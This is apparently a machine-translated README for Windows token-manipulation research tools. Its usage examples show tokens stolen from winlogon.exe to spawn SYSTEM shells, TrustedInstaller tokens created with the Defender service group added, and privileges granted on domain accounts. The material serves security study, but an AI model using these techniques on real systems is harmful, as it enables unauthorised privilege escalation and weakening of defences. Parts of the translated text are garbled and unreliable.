1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
C:Dev>.TokenDump.exe -s -p 3516 -t 4656 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for svchost.exe (PID: 3516, TID: 4656)]
Token User : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x0000000000038CC4
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x000000000002CE61
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeDebugPrivilege EnabledByDefault, Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEDiagTrack EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
==================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEDiagTrack GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000047
Value[0x01] : 0x000000000002C0FA
[*] Done.
トップに戻ります
プロジェクト
このツールは、プライマリトークンを割り当てる方法をlearhすることです。
PS C:Dev> .TokenAssignor.exe
TokenAssignor - Tool to execute token assigned process.
Usage: TokenAssignor.exe [Options]
-h, --help : Displays this help message.
-c, --command : Specifies a command to execute. Default is cmd.exe.
-m, --method : Specifies a method ID (0 - 3).
-p, --pid : Specifies a source PID for token stealing.
[!] -m option is required.
このツールは、指定されたプロセスからトークンを盗もうとし、トークンに割り当てられたプロセスを実行しようとします。ほとんどの方法では、管理特権が必要です。 CreateProcessAsUser APIを使用してトークン割り当てプロセスを実行するには、 -mオプションを0に設定します。
PS C:Dev> Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
270 13 2452 10108 0.33 688 1 winlogon
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 0
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
-mオプションを1に設定すると、このツールは中断されたプロセスを作成し、プライマリトークンを盗まれたトークンに更新しようとします。この方法は、カーネルの制限のためにセッションIDを変更するために使用することはできません。カーネルは、 _EPROCESSのセッションIDと一致するようにトークンのセッションIDを強制します。
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 1
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:Windowssystem32cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJuser (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITYSYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
SET -mオプションが2に設定されている場合、セカンダリログオンサービスを使用して新しいトークン割り当てプロセスを作成します。
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 2
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
SET -mオプションが3に設定されている場合、PPIDスプーフィングメソッドを使用して新しいトークン割り当てプロセスを作成します。
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 3
[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
トップに戻ります
プロジェクト
このツールは、プロセスをNT SERVICETrustedInstaller Groupアカウントとして実行することです。オリジナルのPOCは、Grzegorz TworekのTrustedInstallercmd2.cです。 C#に移植し、ツールとして再構築しました。ほとんどの運用には、管理特権が必要です( SeDebugPrivilege 、 SeImpersonatePrivilege 、および高い必須レベル):
PS C:Dev> .TrustExec.exe
TrustExec - Tool to create TrustedInstaller process.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account name or SID.
-n, --new-console : Flag to create new console. Use with -x flag.
-x, --exec : Flag to execute command.
-a, --account : Specifies account name to lookup.
-c, --command : Specifies command to execute. Default is cmd.exe.
-e, --extra : Specifies command to execute. Default is cmd.exe.
-m, --method : Specifies method ID. Default is 0 (NtCreateToken method).
-s, --sid : Specifies SID to lookup.
Available Method IDs:
+ 0 - Leverages NtCreateToken syscall.
+ 1 - Leverages virtual logon.
+ 2 - Leverages service logon.
+ 3 - Leverages S4U logon.
+ 4 - Leverages TrustedInstaller service.
このモジュールでは、2つのテクニックが実装されています。 -mオプションを使用してメソッドをspecfyすることができます。 -mオプションの値は4 0の整数になります。たとえば、 -mオプションを0に設定した場合、このツールはNtCreateTokenを使用してTrustedInstallerトークンを取得しようとします。
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
新しいコンソールでプロセスを作成する場合は、次のように-nフラグを設定します。
PS C:Dev> .TrustExec.exe -m 1 -x -c powershell -n
[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomainVirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.
TrustEdInStaller Serviceメソッド( -mオプションのIDは4 )以外の各メソッドは、 -eオプションを備えた追加のグループSIDを受け入れます。 -eオプションの値形式は、SDDL SID文字列でなければなりません。 SID String Separatorの場合、次のようにコンマを使用できます。
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINBackup Operators Alias S-1-5-32-551 Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
NT SERVICEWinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group
アカウントを解決するには、sid、set -l flag、および-aオプションを次のように解決するには:
PS C:Dev> .TrustExec.exe -l -a "nt servicewindefend"
[*] Account Name : NT SERVICEWinDefend
[*] Account SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
PS C:Dev> .TrustExec.exe -l -a users
[*] Account Name : BUILTINUsers
[*] Account SID : S-1-5-32-545
[*] Account Type : Alias
トップに戻ります
プロジェクト
このツールは、 secpol.mscなしでユーザーを管理することです。 lookup以外のコマンドには、管理者の特権が必要です。
C:dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
特定のアカウントのユーザー権を列挙するには、 -uを使用してenumコマンドを使用し、 d次のようにオペトンまたは-sオプション:
C:dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
-dオプションでドメイン名を指定しない場合は、ローカルコンピューター名をドメイン名として使用します。
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
このコマンドは、特定の権利を持っているユーザーを見つけることです。たとえば、ユーザーがSeDebugPrivilege持っているのを見つけたい場合は、次のように実行します。
C:dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTINAdministrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
-rオプションの利用可能な値をリストするには、 -lオプションを使用します。
C:dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
このコマンドは、次のようにアカウントSIDを検索するためです。
C:dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSOdavid
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSODomain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
-dオプションでドメイン名を指定しない場合は、ローカルコンピューター名をドメイン名として使用します。
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
このコマンドは、特定のユーザーアカウントにユーザーの権利を付与または取り消すことです。ユーザーを正しく付与するには、 -gの値としてユーザーを正しく指定します。
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
ユーザーを正しく取り消すには、 -rオプションの値としてユーザーを指定します。
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:de>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
-gまたは-rオプションの利用可能な値をリストするには、 -lオプションを使用します。
C:dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
トップに戻ります
トップに戻ります
Windbg拡張プログラミングについてのアドバイスをありがとう:
注目すべき調査をありがとう:
サンプルカーネルドライバーのリリースをありがとう:
